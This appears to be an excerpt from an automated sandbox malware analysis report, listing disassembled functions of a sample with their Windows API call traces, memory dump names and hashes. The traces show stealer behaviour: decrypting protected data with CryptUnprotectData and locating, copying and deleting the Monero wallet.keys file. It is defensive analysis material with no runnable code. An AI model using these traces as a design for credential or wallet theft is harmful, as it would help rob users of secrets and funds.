CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004240AD
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004240BC
HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004240C3
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 004240F3

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapString$AllocProcess
String ID:
API String ID: 3939037734-0
Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction ID: d2b09a1c624c39b133de08918eaa2f92ad29e846d2d732d6bc326f324e173560
Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction Fuzzy Hash: B0011E70600215ABDB149FA5EC85BAB7BADEF85711F108059BE0987340DA7199408BA4

Function 009F42F7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009F4314
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009F4323
RtlAllocateHeap.NTDLL(00000000), ref: 009F432A
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 009F435A

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction ID: cf10160015ac8444c6c398940c9ed81a45aa2a038903c7f269945b312243fb23
Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction Fuzzy Hash: 6F011A70600209ABDB149FA5EC89AABBBADEF85315F104159BE0987240DBB1E9408BA0

Function 00409BE0 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BFF
LocalAlloc.KERNEL32(00000040,?), ref: 00409C13
memcpy.MSVCRT(00000000,?), ref: 00409C2A
LocalFree.KERNEL32(?), ref: 00409C37

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction ID: abf8395257343a8b015b9f0b6c8a158c8b551f0c270fe32e84b7b64ff486a2c6
Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction Fuzzy Hash: F701FB75E41309ABE7109BA4DC45BAAB779EB44700F504169FA04AB380DBB09E008BE4

Function 009D9E47 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009D9E66
LocalAlloc.KERNEL32(00000040,?), ref: 009D9E7A
memcpy.MSVCRT(00000000,?), ref: 009D9E91
LocalFree.KERNEL32(?), ref: 009D9E9E

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction ID: 8eb31d563c4e72e187ca42784d00cd9b6451baf9d59eea1f33169532de9558c7
Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction Fuzzy Hash: CC01FB75A41305ABD710DFA4DC55BAEB779EB44700F108559FA04AB380DBB09A008BE4

Function 00409B80 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B9B
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BAA
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BC1
LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BD0

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction ID: f56e211861b801462745ebf168d915f74eb1128f2766c7b67ff98b51cc3af22d
Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction Fuzzy Hash: 31F0BD703453126BE7305F65AC49F577BA9EB04B61F240415FA49EA2C0E7B49C40CAA4

Function 009D9DE7 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009D9E02
LocalAlloc.KERNEL32(00000040,00000000), ref: 009D9E11
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009D9E28
LocalFree.KERNEL32 ref: 009D9E37

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction ID: dfc56f348da57e2d5cd131a2aa06f22009cc6f18560f869e466698851dfd8d59
Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction Fuzzy Hash: 50F0BD703843126BE7705F65AC49F567BADEB04B51F241415FA49EA2C0E7F4D840CAB4

Function 009ECE47 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 009ECE6D
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 009ECEAD
lstrcpyn.KERNEL32(?,?,00000104), ref: 009ECF30

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWidelstrcpyn
String ID:
API String ID: 1940255200-0
Opcode ID: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
Instruction ID: a5ee95fc1335b8c9d45281f4dd24cc4f60536b8a9f46ea23a0935dc81fa7a32c
Opcode Fuzzy Hash: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
Instruction Fuzzy Hash: C1315471A40629BFD710DB98CC81FA9B7B9AB88B10F504184B604EB2D0D7B0AE45CB90

Function 009F6587 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e1adde497a2ca43af4bba02631a3623e84c378fdb31264d7b34468534bc655b
Instruction ID: 9660e86c1ed5afd44426f2be66ec33fa0469d61a4d3bbdbaf7e5065811ac15bb
Opcode Fuzzy Hash: 0e1adde497a2ca43af4bba02631a3623e84c378fdb31264d7b34468534bc655b
Instruction Fuzzy Hash: 43119132B042289FCB20CF9CE8909B9B3F9EB8971470501AAEA45D7751DB30ED51CB90

Function 009F9A93 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCRT ref: 009F9AA7
free.MSVCRT ref: 009F9AAF
free.MSVCRT ref: 009F9AB7
free.MSVCRT ref: 009F9ABF
free.MSVCRT ref: 009F9AC7
free.MSVCRT ref: 009F9ACF
free.MSVCRT ref: 009F9AD6
free.MSVCRT ref: 009F9ADE
free.MSVCRT ref: 009F9AE6
free.MSVCRT ref: 009F9AEE
free.MSVCRT ref: 009F9AF6
free.MSVCRT ref: 009F9AFE
free.MSVCRT ref: 009F9B06
free.MSVCRT ref: 009F9B0E
free.MSVCRT ref: 009F9B16
free.MSVCRT ref: 009F9B1E
free.MSVCRT ref: 009F9B29
free.MSVCRT ref: 009F9B31
free.MSVCRT ref: 009F9B39
free.MSVCRT ref: 009F9B41
free.MSVCRT ref: 009F9B49
free.MSVCRT ref: 009F9B51
free.MSVCRT ref: 009F9B59
free.MSVCRT ref: 009F9B61
free.MSVCRT ref: 009F9B69
free.MSVCRT ref: 009F9B71
free.MSVCRT ref: 009F9B79
free.MSVCRT ref: 009F9B81
free.MSVCRT ref: 009F9B89
free.MSVCRT ref: 009F9B91
free.MSVCRT ref: 009F9B99
free.MSVCRT ref: 009F9BA1
free.MSVCRT ref: 009F9BAF
free.MSVCRT ref: 009F9BBA
free.MSVCRT ref: 009F9BC5
free.MSVCRT ref: 009F9BD0
free.MSVCRT ref: 009F9BDB
free.MSVCRT ref: 009F9BE6
free.MSVCRT ref: 009F9BF1
free.MSVCRT ref: 009F9BFC
free.MSVCRT ref: 009F9C07
free.MSVCRT ref: 009F9C12
free.MSVCRT ref: 009F9C1D
free.MSVCRT ref: 009F9C28
free.MSVCRT ref: 009F9C33
free.MSVCRT ref: 009F9C3E
free.MSVCRT ref: 009F9C49
free.MSVCRT ref: 009F9C54
free.MSVCRT ref: 009F9C62
free.MSVCRT ref: 009F9C6D
free.MSVCRT ref: 009F9C78
free.MSVCRT ref: 009F9C83
free.MSVCRT ref: 009F9C8E
free.MSVCRT ref: 009F9C99
free.MSVCRT ref: 009F9CA4
free.MSVCRT ref: 009F9CAF
free.MSVCRT ref: 009F9CBA
free.MSVCRT ref: 009F9CC5
free.MSVCRT ref: 009F9CD0
free.MSVCRT ref: 009F9CDB
free.MSVCRT ref: 009F9CE6
free.MSVCRT ref: 009F9CF1
free.MSVCRT ref: 009F9CFC
free.MSVCRT ref: 009F9D07
free.MSVCRT ref: 009F9D15
free.MSVCRT ref: 009F9D20
free.MSVCRT ref: 009F9D2B
free.MSVCRT ref: 009F9D36
free.MSVCRT ref: 009F9D41
free.MSVCRT ref: 009F9D4C
free.MSVCRT ref: 009F9D57
free.MSVCRT ref: 009F9D62
free.MSVCRT ref: 009F9D6D
free.MSVCRT ref: 009F9D78
free.MSVCRT ref: 009F9D83
free.MSVCRT ref: 009F9D8E
free.MSVCRT ref: 009F9D99
free.MSVCRT ref: 009F9DA4
free.MSVCRT ref: 009F9DAF
free.MSVCRT ref: 009F9DBA
free.MSVCRT ref: 009F9DC8
free.MSVCRT ref: 009F9DD3
free.MSVCRT ref: 009F9DDE
free.MSVCRT ref: 009F9DE9
free.MSVCRT ref: 009F9DF4
free.MSVCRT ref: 009F9DFF

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction ID: cd1e51a738305e631eabf60075f1c49b31eccda9252490eafa472988c6d9787f
Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction Fuzzy Hash: 4671F731414B0C9BD7E33BB1DD03B6AFAA27F84301F104915B3DA225B69E32E965BB51

Function 009E8971 Relevance: 66.4, APIs: 44, Instructions: 387stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?), ref: 009E89A3

Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9

StrStrA.SHLWAPI(?,00638C08), ref: 009E89C8
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E89E7
lstrlen.KERNEL32(?), ref: 009E89FA
wsprintfA.USER32 ref: 009E8A0A
lstrcpy.KERNEL32(?,?), ref: 009E8A20
StrStrA.SHLWAPI(?,00638C94), ref: 009E8A4D
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8A74
lstrlen.KERNEL32(?), ref: 009E8A87
wsprintfA.USER32 ref: 009E8A97
lstrcpy.KERNEL32(?,006393D0), ref: 009E8AAD
StrStrA.SHLWAPI(?,00638C5C), ref: 009E8ADA
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8AF9
lstrlen.KERNEL32(?), ref: 009E8B0C
wsprintfA.USER32 ref: 009E8B1C
lstrcpy.KERNEL32(?,?), ref: 009E8B32
StrStrA.SHLWAPI(?,00638ABC), ref: 009E8B5F
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8B7E
lstrlen.KERNEL32(?), ref: 009E8B91
wsprintfA.USER32 ref: 009E8BA1
lstrcpy.KERNEL32(?,?), ref: 009E8BB7
StrStrA.SHLWAPI(?,00638AD0), ref: 009E8BE4
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8C0B
lstrlen.KERNEL32(?), ref: 009E8C1E
wsprintfA.USER32 ref: 009E8C2E
lstrcpy.KERNEL32(?,006393D0), ref: 009E8C44
StrStrA.SHLWAPI(?,0063891C), ref: 009E8C71
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8C90
lstrlen.KERNEL32(?), ref: 009E8CA3
wsprintfA.USER32 ref: 009E8CB3
lstrcpy.KERNEL32(?,?), ref: 009E8CC9
StrStrA.SHLWAPI(?,00638D3C), ref: 009E8CF6
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8D15
lstrlen.KERNEL32(?), ref: 009E8D28
wsprintfA.USER32 ref: 009E8D38
lstrcpy.KERNEL32(?,?), ref: 009E8D4E
StrStrA.SHLWAPI(?,00638B34), ref: 009E8D7B
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009E8DA2
lstrlen.KERNEL32(?), ref: 009E8DB5
wsprintfA.USER32 ref: 009E8DC5
lstrcpy.KERNEL32(?,006393D0), ref: 009E8DDB
lstrlen.KERNEL32(?), ref: 009E8E00
lstrcpy.KERNEL32(00000000,?), ref: 009E8E35
strtok_s.MSVCRT ref: 009E8F12

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcpynwsprintf$FolderPathstrtok_s
String ID:
API String ID: 2042561329-0
Opcode ID: 0e757f730b442b6b043138a9859d54580db3b09a1fb68e8a6a4e1378d116aa89
Instruction ID: 9cd70ae70a5f979e481ab00eaeaf8240fb7367c5e515182016dca0095e6fb682
Opcode Fuzzy Hash: 0e757f730b442b6b043138a9859d54580db3b09a1fb68e8a6a4e1378d116aa89
Instruction Fuzzy Hash: 35E150B1904654AFDB10DFA4DD48AEA77BAEF98300F104599F909E3350DBB4AE01CFA1

Function 009D20E0 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D2106
lstrlen.KERNEL32(006389F0), ref: 009D2115
lstrcpy.KERNEL32(00000000,?), ref: 009D2142
lstrcat.KERNEL32(00000000,?), ref: 009D214A
lstrlen.KERNEL32(00431D64), ref: 009D2155
lstrcpy.KERNEL32(00000000,00000000), ref: 009D2175
lstrcat.KERNEL32(00000000,00431D64), ref: 009D2181
lstrcpy.KERNEL32(00000000,?), ref: 009D21A9
lstrcat.KERNEL32(00000000,00000000), ref: 009D21B4
lstrlen.KERNEL32(00431D64), ref: 009D21BF
lstrcpy.KERNEL32(00000000,00000000), ref: 009D21DC
lstrcat.KERNEL32(00000000,00431D64), ref: 009D21E8
lstrcpy.KERNEL32(00000000,00000000), ref: 009D2213
lstrlen.KERNEL32(?), ref: 009D224B
lstrcpy.KERNEL32(00000000,00000000), ref: 009D226B
lstrcat.KERNEL32(00000000,?), ref: 009D2279
lstrcpy.KERNEL32(00000000,00000000), ref: 009D22A0
lstrlen.KERNEL32(00431D64), ref: 009D22B2
lstrcpy.KERNEL32(00000000,00000000), ref: 009D22D2
lstrcat.KERNEL32(00000000,00431D64), ref: 009D22DE
lstrcpy.KERNEL32(00000000,00000000), ref: 009D2304
lstrcat.KERNEL32(00000000,00000000), ref: 009D230F
lstrcpy.KERNEL32(00000000,00000000), ref: 009D233B
lstrlen.KERNEL32(?), ref: 009D2351
lstrcpy.KERNEL32(00000000,00000000), ref: 009D2371
lstrcat.KERNEL32(00000000,?), ref: 009D237F
lstrcpy.KERNEL32(00000000,00000000), ref: 009D23A9
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D23E6
lstrlen.KERNEL32(00638CA4), ref: 009D23F4
lstrcpy.KERNEL32(00000000,00000000), ref: 009D2418
lstrcat.KERNEL32(00000000,00638CA4), ref: 009D2420
lstrcpy.KERNEL32(00000000,00000000), ref: 009D245E
lstrcat.KERNEL32(00000000), ref: 009D246B
lstrcpy.KERNEL32(00000000,00000000), ref: 009D2494
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009D24BD
lstrcpy.KERNEL32(00000000,00000000), ref: 009D24E9
lstrcpy.KERNEL32(00000000,00000000), ref: 009D2526
DeleteFileA.KERNEL32(00000000), ref: 009D255E
FindNextFileA.KERNEL32(00000000,?), ref: 009D25AB
FindClose.KERNEL32(00000000), ref: 009D25BA

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
String ID:
API String ID: 2857443207-0
Opcode ID: d5fdf3581800270d76cd737130c6eb2ed7cec78ee1207b2e831536629e65eb1a
Instruction ID: 4258e5db47c24e3defd6d7d9890d1852bfaea2558f8c173b06232610e380ffb9
Opcode Fuzzy Hash: d5fdf3581800270d76cd737130c6eb2ed7cec78ee1207b2e831536629e65eb1a
Instruction Fuzzy Hash: FEE15071A412569BCB20EF74CC85BAE7BBAEF95304F048466F805A7361DB78DD01DBA0

Function 00401070 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040108A

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 0040101C
Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
Part of subcall function 00401000: RegCloseKey.ADVAPI32(?), ref: 0040105D

lstrcatA.KERNEL32(?,00000000), ref: 004010A0
lstrlenA.KERNEL32(?), ref: 004010AD
lstrcatA.KERNEL32(?,.keys), ref: 004010C8
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004010FF
lstrlenA.KERNEL32(00A76890), ref: 0040110D
lstrcpy.KERNEL32(00000000,?), ref: 00401131
lstrcatA.KERNEL32(00000000,00A76890), ref: 00401139
lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401144
lstrcpy.KERNEL32(00000000,00000000), ref: 00401168
lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401174
lstrcpy.KERNEL32(00000000,00000000), ref: 0040119A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004011DF
lstrlenA.KERNEL32(00A7E158), ref: 004011EE
lstrcpy.KERNEL32(00000000,?), ref: 00401215
lstrcatA.KERNEL32(00000000,?), ref: 0040121D
lstrcpy.KERNEL32(00000000,00000000), ref: 00401258
lstrcatA.KERNEL32(00000000), ref: 00401265
lstrcpy.KERNEL32(00000000,00000000), ref: 0040128C
CopyFileA.KERNEL32(?,?,00000001), ref: 004012B5
lstrcpy.KERNEL32(00000000,?), ref: 004012E1
lstrcpy.KERNEL32(00000000,?), ref: 0040131D

Part of subcall function 0041EF30: lstrcpy.KERNEL32(00000000,?), ref: 0041EF62

DeleteFileA.KERNEL32(?), ref: 00401351
memset.MSVCRT ref: 0040136E

Strings

\Monero\wallet.keys, xrefs: 0040113F, 0040116E
.keys, xrefs: 004010BC

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
String ID: .keys$\Monero\wallet.keys
API String ID: 2734118222-3586502688
Opcode ID: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
